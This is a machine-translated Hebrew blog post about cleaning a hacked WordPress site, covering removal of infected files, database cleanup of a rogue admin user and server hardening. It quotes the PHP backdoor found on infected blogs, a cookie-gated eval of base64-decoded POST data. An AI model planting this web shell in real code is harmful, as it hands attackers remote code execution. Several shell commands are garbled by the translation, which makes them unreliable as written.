WordPress ניצול - נקה קבצי וירוסים, SQL ואבטחת שרתים.

לפני שאתם קוראים את הפוסט הזה, אתה צריך לראות לפרסם כאן, כדי להבין משהו. :)

מצאתי את זה בכמה קבצי בלוגים ב stealthsettings.com, קודים דומים לאלה שלמטה, שהופיעו כתוצאה מהווירוס עם ההישג של WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

xmlrpcאם הנ"ל הוא על הקובץ xmlrpc.php מ ישנוני, ב grep שרת, נראה כמו די הרבה בקודי מקור מסוג זה.

pppffiuuu

ניקוי של קבצים נגועים:

Ooookkkk ...
1. הפתרון הטוב ביותר, כפי שזה נעשה גיבויוניקו את מסד הנתונים הוא להסיר קבצים WordPress (אתה יכול לשמור את wp-config.php וקבצים שאינם קשורים בקפדנות לפלטפורמת wp, לאחר שהם נבדקים בקפידה) מהשרת ולהעלות את המקוריים מהגרסה 2.5.1 (בהזדמנות זו ולבצע את שדרוג גרסת WP :)) http://wordpress.org/download/ . נגב כולל קבצי נושא אם אתה לא סומך על הבדיקה שהזהירה שלהם.

נראה שהוא נפגע וקבצים של נושאים שלא היה בשימוש בעבר על הבלוג ופשוט משנים את הנושא, אינו פותרים את הבעיה.

./andreea/wp-content/themes/default/index.php:

2. לחפש ולמחוק את כל קבצים המכילים:... * _new.php, * _old.php, * Jpgg, * Giff, * Pngg וקובץ wp-info.txt, אם בכלל.

למצוא. שם "* _new.php"
למצוא. שם "* _old.php"
למצוא. שם "* .jpgg"
למצוא. שם "* _ giff"
למצוא. שם "* _pngg"
למצוא. שם "wp-info.txt"

3. בתוך / Tmp , חפש ולמחוק תיקיות כמו tmpYwbzT2

SQL ניקוי :

1. בטבלה טבלה wp_options בדקו וללמחוק את השורות: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. הכל ב-wp_options, לך ל active_plugins ולמחוק אם יש תוסף שמסתיים באחת מהסיומות * _new.php, _old.php *, *. jpgg, *. giff, *. pngg או אם יש חשד הארכה נוספת, לבדוק בזהירות.

3. בטבלה wp_users, ראה אם ​​יש משתמש שלא כתב שום דבר בו ימנית, העמודה user_nicename. מחק משתמש זה, אך זכור את המספר בעמודת הזיהוי. סביר להניח שמשתמש זה ישתמש ב"WordPress"כ user_login נוצר ומופיע ב00: 00: 00 0000-00-00.

4. עבור לטבלה wp_usermeta ולמחוק את כל הקווים השייכים מזהה לעיל.

לאחר שביצעת ניקוי SQL זה, השבת ואז הפעל כל תוסף. (בבלוג -> לוח מחוונים -> תוספים)

שרת מאובטח:

1. לראות מה תיקיות וקבצים הם "לצריבה"(chmod 777) ונסה לשים א chmod שלא יאפשר יותר את כתיבתם בשום רמה. (chmod 644, למשל)

מצא. פרם--2-LS

2. ראה מה יש לקבצי המערכת קצת SUID או sgid . אם אתה לא משתמש בקבצים אלה לשים עליהם chmod 0 או להסיר את החבילה שהוא מכיל. הם מאוד מסוכנים, כי הם מבצעים הרשאות "קבוצה"או"שורש"לא עם הרשאות משתמש רגילות כדי לבצע את הקובץ הזה.

מוצא / מסוג F-סלסול-04000-LS
מוצא / מסוג F-סלסול-02000-LS

3. בדקו מה יציאות פתוחות ומנסה לסגור או לאבטח את אלה שאינם בשימוש.

netstat-| grep-i להקשיב

כל כך הרבה. אני רואה את בלוגים מסוימים אסרו de Google Search ואחרים אומרים "הוא עשה אותם טוב!!!" . טוב, הייתי עושה את זה בשבילם...אבל מה אתם אומרים אם גוגל תתחיל לאסור כל האתרים טביעה  הוא דואר זבל ולשים את סוסים טרויאניים (Trojan.Clicker.HTML) בעוגיות?

כחובב טכנולוגיה, אני כותב בשמחה ב- StealthSettings.com מאז 2006. יש לי ניסיון עשיר במערכות הפעלה: macOS, Windows, ו- Linux, וגם בשפות תכנות ופלטפורמות בלוגינג (WordPress) ולסוחרת אלקטרונית (WooCommerce, Magento, PrestaShop).

איך » אנטי-וירוס ואבטחה » WordPress ניצול - נקה קבצי וירוסים, SQL ואבטחת שרתים.

חשבתי על "WordPress ניצול - נקה קבצי וירוסים, SQL ואבטחת שרתים."

השאירו תגובה